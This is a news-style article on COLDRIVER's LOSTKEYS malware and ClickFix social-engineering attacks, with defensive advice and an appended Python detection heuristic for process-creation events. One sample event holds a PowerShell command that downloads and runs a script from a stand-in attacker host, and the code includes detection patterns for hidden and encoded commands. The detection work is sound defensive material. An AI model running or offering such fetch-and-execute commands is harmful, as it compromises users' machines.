Cyber espionage has always been a looming threat to users as their dependence on and interaction with digital resources grows. A new malware family dubbed LOSTKEYS has further increased the perils of using the internet. According to Google, a Russian state-backed group known as COLDRIVER has been using LOSTKEYS since the start of the year to spy on Western governments, journalists and non-governmental organizations.
It was Google's threat intelligence group that reported the LOSTKEYS malware in January. According to the reports, COLDRIVER has been deploying the malware in highly targeted ClickFix attacks. ClickFix attacks work by prompting users to copy and run a script; once that script runs on the computer, it paves the way for the malware to be downloaded onto the device.
The main goal of getting users to run the script is to make them download the malware, which Google has identified as a Visual Basic Script. COLDRIVER usually steals login details in order to pilfer emails and contacts. Beyond LOSTKEYS, the group often deploys another malware known as SPICA, which grabs documents and files.
Operating Since 2017
COLDRIVER, the originators of LOSTKEYS, have been carrying out such attacks since 2017. Over time their targets have ranged from defense and government organizations to NGOs and politicians. The attacks have increased since Russia's invasion of Ukraine and have expanded to defense industrial sites.
The U.S. government has already sanctioned a couple of COLDRIVER operatives, and it is currently offering a $10 million reward for tips that could help track down other members.
ClickFix Attacks and How To Save Yourself
The ClickFix technique is often used by attackers to persuade a user to execute a malicious command on their own computer. The command is masqueraded as a fix for an issue the user appears to be facing. These attacks rely on social engineering: typically the attacker asks the user to copy a long command line, paste it into the system's Run window and press Enter. This compromises the computer and often leads to a full-blown malware infection.
Such attacks are usually hidden behind pretexts such as a page that cannot be displayed, a browser that needs refreshing, an error loading a document on a website or from an email, problems with the microphone or camera in Google Meet or Zoom, and many other scenarios that readily occur in everyday use.
How To Protect yourself From Such Attacks
One of the easiest ways to protect yourself from such attacks is to block the [WIN] + [R] key combination, which is rarely needed in day-to-day work. Beyond this, protection can be installed at the mail gateway level, combined with employee awareness training on cyber threats that covers new tactics like this one and how to handle such scenarios.
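As an added example that is not from the article or from Google's reporting, the following Python heuristic scans constructed process-creation events for the launch pattern described above: a script host spawned directly by explorer.exe (which hosts the Run dialog) with a command line that downloads, hides its window or decodes further content. The field names, indicator list and the two-indicator threshold are assumptions for illustration.

```python
import re
from pathlib import PureWindowsPath

# Assumed ClickFix indicators: the Run dialog is hosted by explorer.exe, so a
# pasted command appears as a script host spawned by explorer.exe, usually with
# a long command line that downloads, hides its window or decodes content.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe",
                "powershell.exe", "pwsh.exe", "cmd.exe"}
URL_RE = re.compile(r"https?://", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden\b", re.I)
ENCODED_RE = re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)

def score_event(event):
    """Return the list of indicators matched by one process-creation event."""
    parent = PureWindowsPath(event["parent"]).name.lower()
    image = PureWindowsPath(event["image"]).name.lower()
    cmd = event["cmdline"]
    checks = [
        ("script host spawned by explorer.exe (Run dialog)", parent == "explorer.exe" and image in SCRIPT_HOSTS),
        ("long command line", len(cmd) > 100),
        ("URL in command line", bool(URL_RE.search(cmd))),
        ("hidden window flag", bool(HIDDEN_RE.search(cmd))),
        ("encoded command", bool(ENCODED_RE.search(cmd))),
    ]
    return [name for name, hit in checks if hit]

def find_clickfix(events, min_reasons=2):
    """Return (cmdline, reasons) for events matching at least min_reasons indicators."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if len(reasons) >= min_reasons:
            hits.append((event["cmdline"], reasons))
    return hits

# Constructed sample events with Sysmon-style fields; none of these are real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "Invoke-WebRequest https://attacker.invalid/fix.ps1 -OutFile $env:TEMP\fix.ps1; & $env:TEMP\fix.ps1"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\AppData\Local\Temp\update.vbs"},
]

if __name__ == "__main__":
    for cmdline, reasons in find_clickfix(SAMPLE_EVENTS):
        print(f"ALERT: {cmdline}\n  -> {', '.join(reasons)}")
```

The last sample (a bare wscript.exe launch from explorer.exe) matches only one indicator and is deliberately left below the threshold, since blocking Win+R or lowering the threshold is a tuning decision for each environment. If the same command is pasted into a terminal instead of the Run window, the parent process changes, so the explorer.exe indicator is only one signal among several.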